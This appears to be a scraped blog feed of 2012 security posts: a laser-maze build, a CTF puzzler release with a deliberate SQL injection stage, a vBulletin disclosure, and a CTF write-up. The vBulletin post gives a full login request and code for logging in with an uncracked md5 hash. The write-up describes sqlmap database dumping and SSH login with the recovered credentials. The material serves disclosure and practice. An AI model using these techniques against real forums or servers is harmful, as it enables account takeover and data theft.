<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggwixQE7PTXbcTObkZrKnkWrhsFC2xm9Z_G0Ktj4zLnGGpXgt0awMkrUvTAVqjE_YOwv0vocLoOIS9hFqk4_DT7tKMPjUw4DunPhPWXg-Ad622_c6vXOicKrj4RB6jbQK7Mp8gb7xjSRyX/s1600/lasermaze+article.jpg" target="_blank"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggwixQE7PTXbcTObkZrKnkWrhsFC2xm9Z_G0Ktj4zLnGGpXgt0awMkrUvTAVqjE_YOwv0vocLoOIS9hFqk4_DT7tKMPjUw4DunPhPWXg-Ad622_c6vXOicKrj4RB6jbQK7Mp8gb7xjSRyX/s200/lasermaze+article.jpg" width="100" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">One important detail the journalist left out: Every time someone fails, our laser maze hurls insults at the unfortunate loser. <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggwixQE7PTXbcTObkZrKnkWrhsFC2xm9Z_G0Ktj4zLnGGpXgt0awMkrUvTAVqjE_YOwv0vocLoOIS9hFqk4_DT7tKMPjUw4DunPhPWXg-Ad622_c6vXOicKrj4RB6jbQK7Mp8gb7xjSRyX/s1600/lasermaze+article.jpg" target="_blank">Click here to see full size.</a></td></tr>
</tbody></table>
<br />
Here's a news article from the Sept 15th, 2012 BrainTank mini-conference we had in Providence. My involvement with it was the construction of the laser maze. The initial design of the challenge was done by me and my friend Megan. She owned the physical design, I owned the design of the electronics and programming. There was a lot of crossover as we helped each other through many design challenges. We also had huge amounts of help from friends on the day of deployment. The project was a huge success and I am very proud of myself and everyone who contributed. Next year I hope to build an even better version.<br />
<br />
I spent several months beforehand sourcing all the parts I could.<br />
-5mW 650nm lasers(count:100)<br />
-650nm photoresistors(count:70)<br />
-2xAA battery holders with batteries(count:100)<br />
-All the scrap CAT5 and CAT4 cable I could find<br />
-Arduino Mega and assorted resistors <br />
<br />
It was a challenge finding the correct part when all the information I had on it was a sheet of specifications and a single photo of the object. On top of that, I didn't know much about electronics. I was going to learn with this project. I had to be careful with my purchases because even though I was buying "samples", I couldn't get any of these companies to deal with me for less than $100. I checked, rechecked, and sent off the Western Union money. A few weeks later, I got a big box in the mail. LASERS : 100 PIECES<br />
<br />
Now we're in business!<br />
<br />
<a name='more'></a><br />
<br />
I spent over a month testing every possible arrangement of electronics. I had to build a single laser tripwire, and once I got that right, I could make many more and arrange them into an obstacle course. The entire concept of the thing relies on the behavior of the photoresistor. When light hits it, its resistance drops to almost nothing. When light is absent, its resistance skyrockets. Arduino boards are capable of measuring varying levels of resistance, and the Arduino Mega has 16 ports capable of this. If a single laser beam is broken, the contestant fails the challenge. I found that I could chain three photoresistors on a single circuit, so I could have up to 48 laser beams monitored by a single Arduino Mega board. I tore up a lot of CAT5 and CAT4 cabling for this. Computer cabling was a great choice because it is already designed to transfer electricity, and everyone I knew had scrap cable.<br />
<br />
The circuit design was very simple.<br />
<br />
+5V - photoresistor - photoresistor - photoresistor - Arduino receiver - 220Ω resistor - ground<br />
<br />
Multiply this many times, and you've got one piece of the laser maze.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhleANVFoFTkS3hWcKn7IoR2Vqhh9LstFl3c-JxBIjigU4ocAKq8eIV5X_YyDHLant41bIGFUpq09B95R8apU798nmZLbcOxVmwqF7pJtUHSqs0UWkx1uAh1CwPNje0nYWzdg5q2SUA4Eq-/s1600/191462_10151211505451609_1218423583_o.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhleANVFoFTkS3hWcKn7IoR2Vqhh9LstFl3c-JxBIjigU4ocAKq8eIV5X_YyDHLant41bIGFUpq09B95R8apU798nmZLbcOxVmwqF7pJtUHSqs0UWkx1uAh1CwPNje0nYWzdg5q2SUA4Eq-/s200/191462_10151211505451609_1218423583_o.jpg" width="149" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Click to Enlarge</td></tr>
</tbody></table>
The programming was another matter. While the Arduino could now receive signals indicating its state, it wouldn't have known what each level of voltage means. And even if the code running on the Arduino was perfect, there was no way to communicate to anyone that they broke a beam and lost.<br />
<br />
I ended up using the Arduino IDE to control the Arduino board itself, and I used a language called Processing to allow my laptop to interface with the Arduino's serial input. Since I had never written Java syntax before, I had to pick that up too.<br />
<br />
To get the information from the laser to the laptop, I settled on a simple design. The USB link was seriously limited in communications bandwidth, so I made the Arduino report information only when absolutely necessary. The only things transmitted over the link were a RESET command and a FAIL response. At 9600 baud, transmitting much text was difficult, but with this communication model all I had to transmit was a single bit.<br />
<br />
When a RESET command was sent from my laptop, the Arduino began monitoring every input for failure. If the voltage of any input fell below a hardcoded baseline (determined by the ambient light in the room, defects in the materials, and many other things), then the Arduino would communicate a FAIL back to my laptop. Upon receiving that event, Processing would load a couple of sound files: a siren followed by a randomly chosen insult from some of the most famous and devastatingly witty movies of our time. My computer would then use loudspeakers to publicly shame our now crestfallen participant.<br />
<br />
Huge props go to Brandon for his masterful audio work, for debugging work without which we would not have had a functional program, and for his indispensable work on deployment day.<br />
<br />
The laser maze even had a GUI! I borrowed some code from a GUI tutorial to make a clickable rectangle. The rectangle turned from grey to black to indicate the maze was in a failure state, and turned back and sent a RESET command when you clicked on it. Needless to say, the code was not elegant or pretty in any sense of the word, but since I took on this project precisely because I didn't know this stuff, "barely working" is a coup.<br />
<br />
And all of this only touches on some of the electronic challenges we had to overcome. The laser maze also had a physical component, and we had to settle on the design while overcoming the fact that we were cost limited, had to deploy it within a couple of hours, and had to comply with fire codes. Needless to say, we made and discarded many ideas before settling on the final design. Without Megan's expertise in building prototypes this would not have happened. We used towers made of PVC pipe and an aesthetic inspired by Tron.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCxDrL6h9NtN-B_CVAKs1VhTDuVdEkOexuAFvprA47FF-FBp4Cba4s0iGh_S3kvJIAnUyTApwtg56002-kp0fI_T_6TpJ8MDyN2c4-76c7vFXoJg250slgEfLuJUkT0Rc_QheFAhpWuDgC/s1600/202729_3673539792869_1159056807_o.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCxDrL6h9NtN-B_CVAKs1VhTDuVdEkOexuAFvprA47FF-FBp4Cba4s0iGh_S3kvJIAnUyTApwtg56002-kp0fI_T_6TpJ8MDyN2c4-76c7vFXoJg250slgEfLuJUkT0Rc_QheFAhpWuDgC/s200/202729_3673539792869_1159056807_o.jpg" width="200" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Prototype towers. <br />
We kept the tower shape<br />
but rejected the mirrors</td></tr>
</tbody></table>
<br />
The week before the event, we wove electronics through all the towers and built as much as we could in advance. The worst case scenario was something breaking on the day with no way to fix it. We tried to make our electronics fail in every possible way beforehand so they wouldn't fail on the day of the event. We smashed, burned, stomped on, and electrocuted quite a few of our components. Losing a connection would have been a nightmare, so we made everything as robust as we could.<br />
<br />
Early in the morning on the day of, we started setting everything up. We had over a dozen people helping out- fetching things, soldering, wiring, testing, adjusting. One-by-one, we plugged in a sensor, aimed a laser, and manually modified the Arduino program to display its state. Rinse, repeat. By the end of it, we had a mess of torn up twisted-pair sticking out of a breadboard, tamed only by massive amounts of duct tape. Fragile, sketchy, and completely functional. I asked for a final adjustment of the ambient light. I asked everyone to get in and block a laser. Baseline established. Debugging functions disabled. Sirens enabled. I asked everyone to step aside, sent the RESET command. Ready for the first victim.<br />
<br />
We set up a golden statue and challenged people to get through the lasers, steal it, and sneak out undetected, armed with only a spray canister to see the laser beams with. It was an hour before someone managed to get through successfully. From there, we started having time trials to see who could get through the fastest. The best time was 8 seconds. After some time trials, people started hacking our laser maze.<br />
<br />
Aside from being fragile and having obvious gaps between the beams, our physical security barrier had a design flaw: the sensors didn't care where the light was coming from. Each one reported only an ON or OFF state, light or no light. An attacker armed with their own laser could point it at a sensor and then break the original beam without the sensor noticing. This is what they were doing in the newspaper article.<br />
<br />
It also had a weakness in that the Arduino only sampled each sensor as fast as its main loop ran. If something broke a beam and cleared it again between two consecutive samples, the break was never seen. Several people tried to run through it very fast, but nobody managed to outrun the sampling. You could wave your hand through it, though.<br />
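Both weaknesses are easy to see in a few lines of simulation. This is an illustration I've added here, in Python rather than the Arduino and Processing code the maze actually ran; the ADC values, the blink scheme and the sample periods are assumptions, and the blinking-beam check at the end is a countermeasure to the second-laser trick, not something the maze had.<br />

```python
"""Simulation of the two sensor weaknesses described above.

Added illustration, not the maze's Arduino or Processing code. The ADC
values, the blink scheme and the sample periods are assumptions chosen to
make the effects visible; the write-up only describes the threshold idea.
"""

BASELINE = 600   # assumed 10-bit ADC reading with the beam on the sensor
AMBIENT = 150    # assumed reading with only room light on the sensor
THRESHOLD = 400  # trip level set between the two, as the maze's baseline was


def beam_reading(t_ms, break_start_ms, break_len_ms):
    """Constructed sensor signal: beam present except during one break."""
    if break_start_ms <= t_ms < break_start_ms + break_len_ms:
        return AMBIENT
    return BASELINE


def polled_fail(sample_period_ms, break_start_ms, break_len_ms, duration_ms=1000):
    """Emulate the maze loop: one reading per loop pass, FAIL on the first
    reading under THRESHOLD.  A break shorter than the sample period can
    fall between two readings and is never seen (the hand-wave weakness)."""
    for t in range(0, duration_ms, sample_period_ms):
        if beam_reading(t, break_start_ms, break_len_ms) < THRESHOLD:
            return True
    return False


def sample_blinking_beam(n_samples, spoof=False, blocked=False):
    """Constructed readings from a laser that blinks on/off, sampled once per
    half period.  spoof=True models an attacker holding a steady laser on
    the sensor; blocked=True models a body standing in the beam."""
    readings = []
    for i in range(n_samples):
        if spoof:
            readings.append(BASELINE)   # attacker's light is steady, never blinks
        elif blocked:
            readings.append(AMBIENT)
        else:
            readings.append(BASELINE if i % 2 == 0 else AMBIENT)
    return readings


def beam_intact(readings):
    """Trust the beam only if readings toggle across THRESHOLD every sample,
    i.e. the sensor is seeing *our* blinking laser.  A steady reading, high
    (spoofed) or low (blocked), is a fault either way, so a second laser
    no longer lets an attacker break the real beam unnoticed."""
    highs = [r >= THRESHOLD for r in readings]
    if len(highs) < 2:
        return False
    return all(a != b for a, b in zip(highs, highs[1:]))


if __name__ == "__main__":
    print("20 ms break, 5 ms polling  ->", "FAIL" if polled_fail(5, 120, 20) else "missed")
    print("20 ms break, 50 ms polling ->", "FAIL" if polled_fail(50, 120, 20) else "missed")
    print("honest blinking beam       ->", beam_intact(sample_blinking_beam(8)))
    print("attacker's steady laser    ->", beam_intact(sample_blinking_beam(8, spoof=True)))
```

On real hardware the polling gap is closed with an interrupt or a comparator latch rather than a faster loop, and the blink check needs the sampling to stay in step with the laser driver; the simulation only shows why a single threshold on a single reading is not enough.<br />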
<br />
Overall, the day was a massive success. We had some downtime when things would break, but with the persistence of our volunteers, we were able to get things up and running quickly again. Once I get all the code together I will release it. <br />
<br />
EDIT: Here is the source code for the laser maze. Bonus 47 mp3 clips of insults inside<br />
http://micrmsoft.com/puzzlerchallengeh4u3t4enjr8gr94/final_lasermaze.zipAllison Nixonhttp://www.blogger.com/profile/07417179802217468668noreply@blogger.com0tag:blogger.com,1999:blog-5498034097070054412.post-339090792750623082012-12-05T07:08:00.000-08:002012-12-08T04:02:32.497-08:00Releasing the source code of my puzzlerA couple months ago I released a puzzler on the PaulDotCom podcast and challenged people to complete it. I designed it to be devious and to foil all automated script kiddie scanners while still being vulnerable. Today, I got around to putting the source code together in a package so you could run it yourself, or look at the source code if you want to use parts of the challenge to your own ends. I impose no license restrictions on it. Do with it as you wish and use at your own risk.<br />
<br />
The file is located here:<br />
<a href="http://micrmsoft.com/puzzlerchallengeh4u3t4enjr8gr94/package.zip">http://micrmsoft.com/puzzlerchallengeh4u3t4enjr8gr94/package.zip</a><br />
<br />
Here is a copy of the readme file with instructions:<br />
<br />
<blockquote class="tr_bq">
<blockquote class="tr_bq">
My puzzler. This is a challenge created and designed to be completed within a day. It was something I wrote up in a few weekends. I didn't make the code pretty, so it might take a little while to adapt to your own servers if you want to set it up. If you want to take the time, the instructions are here. You'll need to change a couple of references to domains in some PHP files and a pcap. You'll also need to set up MySQL, an IRC server, and install Comic Sans, which is not a standard font on Linux. I set this up on an Ubuntu box but you can probably make it work on any flavor of Linux.</blockquote>
<blockquote class="tr_bq">
<br />
<a name='more'></a><br /></blockquote>
<blockquote class="tr_bq">
The challenge is accomplished in a linear fashion where the URL to the next step is given upon completing the first step.</blockquote>
<blockquote class="tr_bq">
<br /></blockquote>
<blockquote class="tr_bq">
ZEROTH STAGE************************************************</blockquote>
<blockquote class="tr_bq">
This is an optional stage where I put together a huge obfuscated blob of text containing a URL pointing to the first stage. I used the converter tool found at this blog:</blockquote>
<blockquote class="tr_bq">
http://www.kahusecurity.com/tools/</blockquote>
<blockquote class="tr_bq">
<br /></blockquote>
<blockquote class="tr_bq">
Here is an example blob of text. The blob that I made was totally massive and I made it by feeding the obfuscated text back into the obfuscator for more. </blockquote>
<blockquote class="tr_bq">
%54%68%69%73%20%74%65%78%74%20%6C%65%74%73%20%79%6F%75%20%6B%6E%6F%77%20%79%6F%75%20%64%65%63%6F%64%65%64%20%69%74%20%72%69%67%68%74%2C%20%62%75%74%20%79%6F%75%20%61%72%65%6E%27%74%20%64%6F%6E%65%20%79%65%74%2E%0D%0A%53%47%56%79%5A%53%42%70%63%79%42%30%61%47%55%67%56%56%4A%4D%49%48%64%6F%61%57%4E%6F%49%48%42%76%61%57%35%30%63%79%42%30%62%79%42%30%61%47%55%67%62%6D%56%34%64%43%42%7A%64%47%46%6E%5A%51%3D%3D</blockquote>
<blockquote class="tr_bq">
<br /></blockquote>
<blockquote class="tr_bq">
Of course, if you want to have this stage then you'll need to make your own.</blockquote>
<blockquote class="tr_bq">
<br /></blockquote>
<blockquote class="tr_bq">
FIRST STAGE************************************************</blockquote>
<blockquote class="tr_bq">
This is a login page that authenticates on the client side only. There is a highly secure JavaScript snippet to protect against right clicks, and an FBI warning to boot! Finally, there is a chunk of obfuscated JavaScript. I used Dean Edwards' packer to obfuscate it, and then broke it in small ways so the corresponding de-obfuscator could not be used. If the user can reach page453543543.php successfully, they are pointed to the second stage. </blockquote>
<blockquote class="tr_bq">
-You'll need to supply your own URL on that page.</blockquote>
<blockquote class="tr_bq">
<br /></blockquote>
<blockquote class="tr_bq">
SECOND STAGE************************************************</blockquote>
<blockquote class="tr_bq">
First, it contains a SQL injection vulnerability specially designed to foil automated scanners. All SQL error messages are displayed, but only rendered as a PNG image, in bright pink Comic Sans. No SQL scanner I know of can read these error messages, and any tool I run against it spews garbage because it literally reads the PNG data. To make it work:</blockquote>
<blockquote class="tr_bq">
<br /></blockquote>
<blockquote class="tr_bq">
-You need to install the Comic Sans font, which is not standard on Linux distributions. If you receive font errors you can change line 15 in image.php to refer to a different font or directory of your choice. I included the font file in this package. </blockquote>
<blockquote class="tr_bq">
-You may also need to install some non-standard PHP image manipulation libraries (I don't remember which), but it's likely you will have them by default.</blockquote>
<blockquote class="tr_bq">
-You need to set up MySQL and run the .sql script so your database is populated with the necessary data. The SQL username and password are on lines 11 and 12 of index.php</blockquote>
<blockquote class="tr_bq">
-You also need to set up an IRC server, protected by a server password of your choice. Details below:</blockquote>
<blockquote class="tr_bq">
<br /></blockquote>
<blockquote class="tr_bq">
<br /></blockquote>
<blockquote class="tr_bq">
<br /></blockquote>
<blockquote class="tr_bq">
The pcap itself contains a record of a user logging into my IRC server in plain text while visiting some websites at the same time. The correct packet is the only one on its port, and would appear anomalous when viewing statistics about the pcap. A server password is used to log in to the IRC server, so one has to find the correct packet in the pcap to find the correct domain and password. It points to a domain I own; if you want to set up your own IRC server, I suggest you set it up with a server password, and run a packet capture of yourself while visiting websites and logging into your own IRC server. </blockquote>
<blockquote class="tr_bq">
<br /></blockquote>
<blockquote class="tr_bq">
The final, winning step of the puzzle is of course when the user can find the correct IRC credentials, log in, and join the #winnerscircle channel.</blockquote>
<blockquote class="tr_bq">
<br /></blockquote>
<blockquote class="tr_bq">
Hopefully you find this challenge as devious and frustrating as I intended it to be.</blockquote>
</blockquote>
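For the zeroth stage, the blob in the readme is a percent-encoded line of text with a base64 line hidden inside it, and the full-size blob was the same trick applied to its own output repeatedly. Here is a small peeler I've added for it; this is example code, not part of the puzzler package, and the only input it uses is the sample blob quoted above.<br />

```python
"""Peel the nested percent-encoding and base64 layers of the zeroth stage.

Added example, not the puzzler's own code.  SAMPLE_BLOB is the example
blob from the readme above; the peeler is generic because the real blob
was built by feeding the obfuscator its own output over and over.
"""
import base64
import re
from urllib.parse import unquote

PERCENT = re.compile(r"%[0-9A-Fa-f]{2}")
B64_LINE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")

SAMPLE_BLOB = (
    "%54%68%69%73%20%74%65%78%74%20%6C%65%74%73%20%79%6F%75%20%6B%6E%6F%77%20%79%6F%75%20"
    "%64%65%63%6F%64%65%64%20%69%74%20%72%69%67%68%74%2C%20%62%75%74%20%79%6F%75%20%61%72%65%6E%27%74%20"
    "%64%6F%6E%65%20%79%65%74%2E%0D%0A"
    "%53%47%56%79%5A%53%42%70%63%79%42%30%61%47%55%67%56%56%4A%4D%49%48%64%6F%61%57%4E%6F%49%48%42%76"
    "%61%57%35%30%63%79%42%30%62%79%42%30%61%47%55%67%62%6D%56%34%64%43%42%7A%64%47%46%6E%5A%51%3D%3D"
)


def _is_text(s):
    return all(ch.isprintable() or ch in "\r\n\t" for ch in s)


def _try_base64(line):
    """Decoded text if `line` is a base64 blob of printable text, else None.
    Short tokens are skipped so ordinary words are not mistaken for base64."""
    if len(line) < 8 or len(line) % 4 or not B64_LINE.match(line):
        return None
    try:
        decoded = base64.b64decode(line, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    return decoded if _is_text(decoded) else None


def peel_once(text):
    """Strip one layer from every line that carries one; (new_text, changed)."""
    changed, out = False, []
    for line in text.replace("\r\n", "\n").split("\n"):
        if PERCENT.search(line):
            line, changed = unquote(line), True
        else:
            decoded = _try_base64(line)
            if decoded is not None:
                line, changed = decoded, True
        out.append(line)
    return "\n".join(out), changed


def peel(blob, max_layers=32):
    """Peel until a pass changes nothing; returns (non-empty lines, layers)."""
    text, layers = blob, 0
    for _ in range(max_layers):
        text, changed = peel_once(text)
        if not changed:
            break
        layers += 1
    lines = text.replace("\r\n", "\n").split("\n")
    return [ln.strip() for ln in lines if ln.strip()], layers


if __name__ == "__main__":
    lines, layers = peel(SAMPLE_BLOB)
    print(f"{layers} layers removed")
    for ln in lines:
        print(" ", ln)
```

The layer cap matters when you point a peeler like this at an untrusted blob: a decoder that loops "until nothing changes" with no limit is a cheap denial-of-service target.<br />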
<br />
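The second-stage pcap step is the same triage a responder does on any capture: tally destination ports, look at the odd one out, and read the plaintext protocol on it. I've added the sketch below as example code, not something shipped with the puzzler; the real capture is not reproduced here, so FLOWS is a constructed stand-in with made-up hosts and a hypothetical server password.<br />

```python
"""Triage of the stage-two capture: find the one flow on an unusual port and
pull the plaintext IRC server password out of it.

Added example, not part of the puzzler.  The real pcap is not reproduced;
FLOWS is a constructed stand-in for what a "conversations" or port
statistics view of it would show, with made-up hosts and a hypothetical
password.  Standard library only.
"""
from collections import Counter

# (dst_host, dst_port, reassembled client payload) -- constructed, not the real capture
FLOWS = [
    ("www.example.com", 80, b"GET / HTTP/1.1\r\nHost: www.example.com\r\n\r\n"),
    ("www.example.com", 80, b"GET /style.css HTTP/1.1\r\nHost: www.example.com\r\n\r\n"),
    ("cdn.example.net", 443, b"\x16\x03\x01\x00\xa5\x01\x00\x00\xa1\x03\x03"),
    ("irc.example.org", 6667,
     b"PASS hypothetical-server-pw\r\nNICK contestant\r\nUSER c 0 * :c\r\n"),
    ("www.example.com", 80, b"GET /img.png HTTP/1.1\r\nHost: www.example.com\r\n\r\n"),
]


def rare_ports(flows, max_count=1):
    """Destination ports seen at most max_count times: the anomaly candidates."""
    counts = Counter(port for _, port, _ in flows)
    return sorted(p for p, c in counts.items() if c <= max_count)


def irc_login(payload):
    """Parse the IRC registration lines (PASS, NICK, as in RFC 1459) out of
    a client payload.  Returns None unless a PASS line is present."""
    try:
        text = payload.decode("ascii")
    except UnicodeDecodeError:
        return None          # binary (e.g. a TLS handshake), not IRC
    creds = {}
    for line in text.split("\r\n"):
        verb, _, rest = line.partition(" ")
        if verb in ("PASS", "NICK") and rest:
            creds[verb.lower()] = rest
    return creds if "pass" in creds else None


def find_irc_credentials(flows):
    """Look only at flows on rare ports, then run the IRC parser on each."""
    candidates = set(rare_ports(flows))
    hits = []
    for host, port, payload in flows:
        if port in candidates:
            creds = irc_login(payload)
            if creds:
                hits.append((host, port, creds["pass"], creds.get("nick")))
    return hits


if __name__ == "__main__":
    print("rare ports:", rare_ports(FLOWS))
    for host, port, pw, nick in find_irc_credentials(FLOWS):
        print(f"IRC login to {host}:{port} as {nick!r} with server password {pw!r}")
```

Note that the rare-port list alone is not the answer; the single TLS flow is just as rare as the IRC one, and it is the protocol parse that tells them apart.<br />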
A final mention- there are a couple references left in the pcap of the domain I originally used. I used to point it to a sinkhole because the previous owner used it for malware. I am not responsible for the malware but it amused me to hold a challenge on a domain that would trigger DNS blacklist alerts for any contestants. You are of course free to use any domain you want to register. YMMV.Allison Nixonhttp://www.blogger.com/profile/07417179802217468668noreply@blogger.com0tag:blogger.com,1999:blog-5498034097070054412.post-88203069458425005542012-11-16T23:15:00.002-08:002012-12-06T20:00:40.821-08:00Old Working Exploits - or how you can log in to vbulletin forums with a user's uncracked hashThis is an issue I reported way back in 12/11/10 (reference SID-1046901-fc4373fb) and they declined to recognize it as a bug, so I'll post it for the benefit of the public.<br />
<br />
It requires an uncracked md5 hash of a user's password on a vBulletin forum. When you log in, the browser doesn't actually transmit the password in plain text; it transmits the md5 hash of the password. That's great! Any forum running over plain HTTP is then far less exposed to sniffing of plaintext passwords. There's a problem, though:<br />
<br />
md5 is commonly used as a password hashing algorithm, and hacked websites out there commonly leak databases full of these hashes. Typically, md5-hashed passwords can be cracked 40-50 percent of the time. Attackers rely heavily on password reuse, and because vBulletin accepts the hash in place of the password, the unsalted md5 is itself a usable credential: if you're part of the 50-60 percent of users with an uncrackable password, any accounts you have on a vBulletin forum still aren't safe if you've reused that password elsewhere. The issue can be mitigated by changing the login method to anything an attacker can't drive with a known md5 of the password, for example sending the password itself over HTTPS and doing all hashing server-side.<br />
<br />
It's an edge case for sure, but if you're in the business of mass hacking accounts, then perhaps this edge case can net you that many more victims.<br />
<br />
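To make the "password-equivalent hash" point concrete, here is a small model I've added (not vBulletin's code): a client that builds the login body from nothing but a hash, a legacy server that verifies it, and a hardened server that takes the password itself over TLS. The legacy model assumes the widely documented vBulletin 3/4 storage scheme md5(md5(password) + salt), and the hardened one is one reasonable replacement rather than the vendor's own fix.<br />

```python
"""Why an unsalted md5 is a usable credential on a forum that accepts
vb_login_md5password, and what changes once the server insists on the
password itself.

Added example, not vBulletin's code.  The legacy model assumes the widely
documented vBulletin 3/4 storage scheme md5(md5(password) + salt); the
hardened model is one reasonable replacement, not the vendor's own fix.
The salts are made up.
"""
import hashlib
import hmac
from urllib.parse import urlencode


def md5_hex(data):
    return hashlib.md5(data.encode("utf-8")).hexdigest()


def build_login_body(username, md5_password):
    """Form body in the shape of the request shown below: the plaintext field
    is sent empty and the md5 fields carry the credential."""
    return urlencode([
        ("vb_login_username", username),
        ("vb_login_password", ""),
        ("s", ""),
        ("securitytoken", "guest"),
        ("do", "login"),
        ("vb_login_md5password", md5_password),
        ("vb_login_md5password_utf", md5_password),
    ])


# Legacy model: the client sends md5(password); the server stores
# md5(md5(password) + salt) and so never needs the password itself.
def legacy_enroll(password, salt):
    return md5_hex(md5_hex(password) + salt)


def legacy_verify(stored, salt, client_md5):
    """Whoever knows md5(password), cracked or not, gets in."""
    return hmac.compare_digest(md5_hex(client_md5 + salt), stored)


# Hardened model: the client sends the password over TLS and the server
# does all hashing with a salted, slow KDF.  A leaked md5(password) is
# now just a string that is not the password.
def hardened_enroll(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 100_000)


def hardened_verify(stored, salt, client_password):
    return hmac.compare_digest(hardened_enroll(client_password, salt), stored)


if __name__ == "__main__":
    leaked = md5_hex("aaaa")                 # pulled from some other site's md5 dump
    print(build_login_body("abcd", leaked))
    print("legacy, hash only  :", legacy_verify(legacy_enroll("aaaa", "xyz"), "xyz", leaked))
    print("hardened, hash only:", hardened_verify(hardened_enroll("aaaa", b"s1"), b"s1", leaked))
```

The body the model produces is byte-for-byte the one in the captured request below, 185 bytes including the empty vb_login_password field; the attacker never had to know that the password was "aaaa".<br />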
Here's an example login request that would be produced from any of the latest VB forums:<br />
<br />
username: abcd<br />
password: aaaa<br />
hash: 74b87337454200d4d33f80c4663dc5e5 = aaaa<br />
<br />
<br />
POST /login.php?do=login HTTP/1.1<br />
Host: forums.forum.com<br />
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0<br />
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />
Accept-Language: en-US,en;q=0.5<br />
Accept-Encoding: gzip, deflate<br />
DNT: 1<br />
Proxy-Connection: keep-alive<br />
Referer: http://forums.forum.com/<br />
Cookie: bbsessionhash=bbd4f543da0af78506ebe3b185368240; bblastvisit=1353135560; bblastactivity=0; AAJSID=balancer.www1<br />
Content-Type: application/x-www-form-urlencoded<br />
Content-Length: 185<br />
<br />
vb_login_username=abcd&vb_login_password=&s=&securitytoken=guest&do=login&vb_login_md5password=74b87337454200d4d33f80c4663dc5e5&vb_login_md5password_utf=74b87337454200d4d33f80c4663dc5e5Allison Nixonhttp://www.blogger.com/profile/07417179802217468668noreply@blogger.com0tag:blogger.com,1999:blog-5498034097070054412.post-79540451042164819142012-11-14T17:32:00.003-08:002012-12-06T20:00:49.211-08:00Hackin' The Boss [Part 2]<br />
Before diving into the injectable "id" parameter, I wanted to explore other options to potentially gain complete control over the target. This would in effect make finding the remaining flags quite simple. With that goal in mind, and a local saved version of the "test.php" configuration page (which was removed by this time, of course I kept a copy) it was time to start looking for potential methods of ingress.<br />
<br />
After exploring multiple OSINT sources (Shodan and Exploit-DB, to name a few), I wasn't able to find much promising material. Perhaps, then, if the web apps weren't the gateway I needed, something else could provide access. A quick nmap of common service ports showed that, as expected, ports 80 and 443 were open. However, port 22 (SSH) was also open. Not a ton of additional information, but enough for nmap to fingerprint the OS. Next up, the excellent Metasploit front-end GUI, Armitage.<br />
<br />
With Metasploit updated, I loaded up Armitage and ran an MSF scan against the target host. Selecting "find attacks" revealed a large number of potential exploits to try. Since I was behind my totally not-at-all suspicious VPN, it was time to fire everything at the CTF server. Alas, all automated attempts failed and no sessions were established. Oh well, it can't always be easy! **Note: Apparently the original CTF was designed to be vulnerable to the php_eval module found in Metasploit; this particular setup was not vulnerable.**<br />
<br />
My first plan thwarted, it was time to dump the database and comb it for useful information (and flags!). With ye olde sqlmap up and running, I fed the parameter "id=" to the beast. Within a minute, the entire database had been dumped to my local hard drive, and while watching the console print the results I noticed a pretty interesting flag that appeared to contain credentials! Unfortunately, the console had scrolled far too quickly for me to catch the details, so I started to dig into the dumped database to retrieve what looked to be my golden ticket.<br />
<br />
After a quick search, I found the flag in the "board.users" table of the database which contained a user/password combination. The next flag was found in "test.notes", and this seemed to be the only other flag present in the db dump. I now had 5/11 (at the time, thought to be 12) flags, MySQL database credentials, and what appeared to be a user/password combination. From previous nmapping, I knew that port 22 was open, so it was time to try and login with the recovered credentials.<br />
<br />
With the recovered username/password combo, I was able to SSH successfully to the CTF server. The home directory contained a single file, an ELF executable, which accepted a string as its parameter. Sensing the presence of another flag, I hexdumped the file and found flag #6 (I should have just run strings against the file, but I wanted to see the context). I moved to the base directory and found another text file labelled "flag". Boom, #7. At this point, I wasn't entirely sure where to look next, so I poked around until I got to /etc/php/apache2 and catted out the php.ini file. Therein was flag #8.<br />
<br />
Moving back into the /var/www/ directory, there was an additional element included with this version of the CTF that differed from the OWASP one. A fully functional, basic version of "Frogger" (written in JavaScript) was present. I have never been good at frogger, and I expected there could be a flag hidden somewhere. I grepped through the various files found in the directory to no avail, but decided to take a second look at the JavaScript of the game. Inside was a hex encoded string, flag #9.<br />
<br />
Since I had the MySQL database credentials, why not connect to the database and check for the presence of more flags? Upon successful connection and enumeration of the table names, several simple SELECT * FROM queries confirmed the 2 previous flags I had found, and an additional flag in "board.posts" which I had previously missed. And thus Flag #10 was recovered.<br />
<br />
Unfortunately, I wasn't able to recover the last flag. Apparently there was a webpage with a very colorful, animated image with a flag embedded as a test of one's steganography skills. I had suspected this seizure-inducing page hid a flag, but I never suspected steganography. Yeah, I completely missed that one (I would blame colorblindness, but that likely isn't an adequate excuse). Oh well, 10 of 11 isn't too bad!<br />
<br />
All in all, this was a lot of fun. If you haven't participated in a CTF event before, I would highly recommend it. Especially if the CTF server belongs to your boss. That makes it all the sweeter.<br />
Anonymoushttp://www.blogger.com/profile/07700158074972140726noreply@blogger.com0tag:blogger.com,1999:blog-5498034097070054412.post-89699521694477391962012-11-12T14:29:00.002-08:002012-12-06T20:00:49.212-08:00Hackin' the Boss [Part 1]<br />
